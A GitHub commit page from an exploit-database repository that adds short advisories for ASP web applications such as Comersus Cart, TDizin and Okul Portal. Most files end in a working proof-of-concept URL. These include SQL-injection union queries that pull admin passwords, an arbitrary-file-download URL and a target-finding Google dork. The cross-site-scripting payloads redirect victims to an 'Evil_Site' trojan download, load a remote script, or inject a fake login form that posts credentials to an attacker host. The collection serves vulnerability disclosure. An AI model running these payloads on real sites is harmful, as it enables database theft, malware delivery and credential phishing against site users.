Skip to content

Commit 6bd122c

Browse files
author
Offensive Security
committed
Updated 12_12_2013
1 parent 5a468df commit 6bd122c

229 files changed

Lines changed: 17060 additions & 13228 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

files.csv

Lines changed: 1518 additions & 1422 deletions
Large diffs are not rendered by default.

platforms/aix/local/1001.txt

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -284,6 +284,6 @@ bash-2.05b#
284284
bash-2.05b# rm /tmp/.bel*
285285
bash-2.05b# rm /tmp/passwd
286286
bash-2.05b#
287-
288-
289-
# milw0rm.com [2005-05-19]
287+
288+
289+
# milw0rm.com [2005-05-19]

platforms/asp/webapps/30141.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/24288/info
2+
3+
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
6+
7+
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
8+
9+
http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin

platforms/asp/webapps/30159.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/24345/info
2+
3+
ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
4+
5+
An attacker can exploit this issue to download arbitrary files within the context of the affected webserver.
6+
7+
http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp

platforms/asp/webapps/30165.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/24379/info
2+
3+
Ibrahim �?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
6+
7+
Ibrahim �?AKICI Okul Portal 2.0 is vulnerable to this issue.
8+
9+
http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler

platforms/asp/webapps/30195.txt

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
#********************************************************************************
2+
# Exploit Title : Webnet Studio Sql Injection Vulnerability
3+
#
4+
# Exploit Author : Ashiyane Digital Security Team
5+
#
6+
# Vendor Homepage : http://www.webnetstudio.it
7+
#
8+
# Google Dork : intext:"powered by Webnet Studio"
9+
#
10+
# Date: 2013-12-10
11+
#
12+
# Tested on: Windows 7 , Linux
13+
#
14+
# discovered by : ACC3SS
15+
-------------------------------------------------------------------
16+
# Exploit : Sql Injection
17+
#
18+
# Location : [Target]/content.asp?ID=[Sql Injection]
19+
#
20+
######################

platforms/asp/webapps/30198.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/24515/info
2+
3+
TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
6+
7+
http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+

platforms/asp/webapps/30203.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/24562/info
2+
3+
Comersus Cart is affected by multiple input validation vulnerabilities.
4+
5+
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
6+
7+
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
8+
9+
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
10+
11+
http://www.example.com/store/comersus_optReviewReadExec.asp?idProduct='

platforms/asp/webapps/30204.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/24562/info
2+
3+
Comersus Cart is affected by multiple input validation vulnerabilities.
4+
5+
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
6+
7+
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
8+
9+
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
10+
11+
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

platforms/asp/webapps/30205.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/24562/info
2+
3+
Comersus Cart is affected by multiple input validation vulnerabilities.
4+
5+
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
6+
7+
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
8+
9+
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
10+
11+
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>

0 commit comments

Comments
 (0)